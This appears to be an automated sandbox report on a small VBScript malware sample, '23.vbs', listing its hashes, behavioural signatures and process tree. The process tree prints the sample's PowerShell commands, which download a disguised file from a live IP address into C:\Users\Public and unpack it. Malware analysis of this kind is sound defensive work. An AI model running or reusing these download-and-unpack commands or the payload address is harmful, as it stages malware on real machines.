Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
16-05-2024 09:10
Static task
static1
Behavioral task
behavioral1
Sample
23.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
23.vbs
Resource
win10v2004-20240508-en
General
-
Target
23.vbs
-
Size
765B
-
MD5
f20392bba3e6958992646b0f76a78dd9
-
SHA1
9ed260c4d4d971b150c4d44468c6968d1476457a
-
SHA256
75e7e4a0cfee9bdc0640cd9efcbab1c09ef1552f1abaf35c5dbb15955b1994cf
-
SHA512
02662eebc665938ac53b79b65bfd57ac6e39252e1e32364ffdbb0a7df2c248b778677a12f05a4708a25b703aa5a69896e39a8bd1fc5de434a3cf3fa850d12c8b
Malware Config
Extracted
http://154.17.167.74/90/RKJ.jpg
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2128 powershell.exe 2736 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3008 wrote to memory of 2128 3008 WScript.exe 28 PID 3008 wrote to memory of 2128 3008 WScript.exe 28 PID 3008 wrote to memory of 2128 3008 WScript.exe 28 PID 3008 wrote to memory of 2736 3008 WScript.exe 30 PID 3008 wrote to memory of 2736 3008 WScript.exe 30 PID 3008 wrote to memory of 2736 3008 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://154.17.167.74/90/RKJ.jpg' -Destination 'C:\Users\Public\bbbb.zip'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HIOBKPUVZ7CLMKOG5UGE.temp
Filesize7KB
MD562f78e9c8706bec48512a51e9cbd0420
SHA17550ede29e2c82e83f1831f7252fcda73e2129d9
SHA256b8636ba0a5692eb96405687fa2e2b668dbb3c605cb88cdd77d90ac0148906aea
SHA51206aaa57c9e8cdbc2a91b5e9b883ed0a322aecd5046f0f6684bf73d9b0f82dbf9529482f170c5604ef35b67443f61f5dfce0157bfd7c13e12f62f15f73d110a8c